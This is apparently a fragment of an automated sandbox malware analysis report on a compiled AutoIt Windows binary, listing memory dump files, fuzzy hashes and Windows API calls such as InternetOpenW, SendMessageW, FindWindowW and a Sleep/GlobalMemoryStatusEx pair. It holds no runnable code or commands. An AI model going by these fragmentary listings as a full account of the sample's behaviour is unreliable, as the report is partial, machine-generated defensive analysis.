• Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
• Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
• Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
• Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
• Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
• Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 004515DA
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
• Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
APIs
• Sleep.KERNEL32(00000000), ref: 00474833
• GlobalMemoryStatusEx.KERNEL32 ref: 00474846
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
• Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
• Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
• Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
• Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
• Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
• Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
• Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: _strncmp
• String ID: ,$UTF8)
• API String ID: 909875538-2632631837
• Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
• Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
• Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
• Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: _strncmp
• String ID: ,$UTF8)
• API String ID: 909875538-2632631837
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• wsprintfW.USER32 ref: 004560E9
Strings
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
• PostMessageW.USER32(00000000), ref: 00442247
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
  • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283